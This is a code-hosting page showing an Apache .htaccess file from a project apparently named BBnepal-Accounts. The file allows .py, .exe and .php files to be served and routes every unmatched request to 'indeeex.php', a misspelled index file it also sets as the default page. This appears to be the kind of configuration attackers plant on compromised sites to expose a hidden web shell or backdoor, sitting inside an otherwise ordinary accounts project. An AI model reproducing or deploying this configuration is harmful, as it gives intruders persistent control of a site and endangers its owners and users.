BBnepal-Accounts/account/system/.htaccess

11 lines
281 B
ApacheConf
Raw Permalink Normal View History

2024-07-10 12:43:19 +00:00
<FilesMatch ".(py|exe|php)$">
Order allow,deny
Allow from all
</FilesMatch>
RewriteEngine On
RewriteBase /
RewriteRule ^indeeex\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /indeeex.php [L]
DirectoryIndex indeeex.php index.php